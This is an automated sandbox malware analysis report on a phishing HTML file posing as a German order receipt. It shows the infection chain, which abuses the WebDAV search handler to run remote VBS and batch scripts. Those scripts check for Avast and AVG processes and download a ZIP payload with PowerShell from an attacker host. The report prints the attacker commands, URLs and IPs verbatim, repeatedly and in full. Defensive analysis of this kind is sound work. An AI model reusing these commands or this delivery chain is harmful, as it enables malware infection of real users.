Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Belegdetails Nr378-938-027181-PDF.html

Overview

General Information

Sample name:Belegdetails Nr378-938-027181-PDF.html
Analysis ID:1567616
MD5:25addaac28d004af8763a737c9c848d1
SHA1:ecfd2185c16f08820ee4a143e4acc2a2fbadce52
SHA256:ca16452d778ca4a40af50ae2e47ce1af5b00f94f870ed88632bb0cc618065631
Infos:

Detection

WinSearchAbuse
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected WinSearchAbuse
Chrome launches external ms-search protocol handler (WebDAV)
HTML document with suspicious name
HTML document with suspicious title
Opens network shares
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 5592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Belegdetails Nr378-938-027181-PDF.html MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 5524 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1908,i,6058535116929944885,16227351623237852936,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • svchost.exe (PID: 7092 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 6356 cmdline: "C:\Windows\System32\WScript.exe" "\\ira-documents-fix-survivor.trycloudflare.com@SSL\DavWWWRoot\porderx.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6376 cmdline: "C:\Windows\System32\cmd.exe" /c \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Acrobat.exe (PID: 3164 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BNAGMGSPLO.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 5636 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 6976 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2292 --field-trial-handle=1592,i,10281538565762986671,7126053446224779264,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • timeout.exe (PID: 3596 cmdline: timeout /t 5 REM Wait for PDF to open (adjust timeout as needed) MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • tasklist.exe (PID: 6096 cmdline: tasklist /FI "IMAGENAME eq AvastUI.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • find.exe (PID: 6312 cmdline: find /i "AvastUI.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
      • tasklist.exe (PID: 1728 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • find.exe (PID: 5896 cmdline: find /i "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
      • powershell.exe (PID: 3132 cmdline: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip' -OutFile 'C:\Users\user\Downloads\downloadpack.zip' } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Belegdetails Nr378-938-027181-PDF.htmlJoeSecurity_WinSearchAbuseYara detected WinSearchAbuseJoe Security

    HTML

    SourceRuleDescriptionAuthorStrings
    0.0.pages.csvJoeSecurity_WinSearchAbuseYara detected WinSearchAbuseJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: PowerShell Web Download
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip' -OutFile 'C:\Users\user\Downloads\downloadpack.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip' -OutFile 'C:\Users\user\Downloads\downloadpack.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6376, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip' -OutFile 'C:\Users\user\Downloads\downloadpack.zip' } catch { exit 1 }", ProcessId: 3132, ProcessName: powershell.exe
      Sigma detected: Usage Of Web Request Commands And Cmdlets
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip' -OutFile 'C:\Users\user\Downloads\downloadpack.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip' -OutFile 'C:\Users\user\Downloads\downloadpack.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6376, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip' -OutFile 'C:\Users\user\Downloads\downloadpack.zip' } catch { exit 1 }", ProcessId: 3132, ProcessName: powershell.exe
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "\\ira-documents-fix-survivor.trycloudflare.com@SSL\DavWWWRoot\porderx.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "\\ira-documents-fix-survivor.trycloudflare.com@SSL\DavWWWRoot\porderx.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4552, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "\\ira-documents-fix-survivor.trycloudflare.com@SSL\DavWWWRoot\porderx.vbs" , ProcessId: 6356, ProcessName: wscript.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip' -OutFile 'C:\Users\user\Downloads\downloadpack.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip' -OutFile 'C:\Users\user\Downloads\downloadpack.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6376, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip' -OutFile 'C:\Users\user\Downloads\downloadpack.zip' } catch { exit 1 }", ProcessId: 3132, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7092, ProcessName: svchost.exe

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      HTML document with suspicious title
      Source: file:///C:/Users/user/Desktop/Belegdetails%20Nr378-938-027181-PDF.htmlTab title: Order Receipt
      Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.17:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.17:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49727 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.16.158.33:443 -> 192.168.2.17:49746 version: TLS 1.2

      Software Vulnerabilities

      barindex
      Yara detected WinSearchAbuse
      Source: Yara matchFile source: Belegdetails Nr378-938-027181-PDF.html, type: SAMPLE
      Source: Yara matchFile source: 0.0.pages.csv, type: HTML
      Suspicious execution chain found
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: chrome.exeMemory has grown: Private usage: 1MB later: 29MB

      Networking

      barindex
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5515
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 5515
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 5515
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 5515 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 2610
      Source: unknownNetwork traffic detected: HTTP traffic on port 2610 -> 49741
      Source: global trafficTCP traffic: 192.168.2.17:49710 -> 83.136.208.180:5515
      Source: global trafficTCP traffic: 192.168.2.17:49741 -> 83.136.209.53:2610
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.10
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.10
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.10
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.10
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.10
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.10
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.10
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.10
      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
      Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
      Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
      Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
      Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
      Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
      Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
      Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
      Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
      Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
      Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
      Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
      Source: global trafficHTTP traffic detected: GET /aussc/Receipt_details_A378-938-027181.lnk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: msc4dfl1ed7eb485ad6ahelixpflanzen.de:5515
      Source: global trafficHTTP traffic detected: GET /WRBETIS.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610Connection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: winaero.com
      Source: global trafficDNS traffic detected: DNS query: msc4dfl1ed7eb485ad6ahelixpflanzen.de
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de
      Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 396Date: Tue, 03 Dec 2024 15:39:57 GMTServer: WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.1
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
      Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.17:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.17:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49727 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.16.158.33:443 -> 192.168.2.17:49746 version: TLS 1.2

      System Summary

      barindex
      HTML document with suspicious name
      Source: Name includes: Belegdetails Nr378-938-027181-PDF.htmlInitial sample: detail
      Windows Scripting host queries suspicious COM object (likely to drop second stage)
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip' -OutFile 'C:\Users\user\Downloads\downloadpack.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://cjmsc4dfl1ed7eb485ad6ahelix-pflanzen.de:2610/WRBETIS.zip' -OutFile 'C:\Users\user\Downloads\downloadpack.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: classification engineClassification label: mal84.phis.troj.spyw.expl.evad.winHTML@53/26@9/153
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1948:120:WilError_03
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-03 10-40-53-275.log
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\cultural-theorem-enclosed-meaningful.trycloudflare.com@SSL\DavWWWRoot\onzau.bat
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "\\ira-documents-fix-survivor.trycloudflare.com@SSL\DavWWWRoot\porderx.vbs"
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Belegdetails Nr378-938-027181-PDF.html
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1908,i,6058535116929944885,16227351623237852936,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1908,i,6058535116929944885,16227351623237852936,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
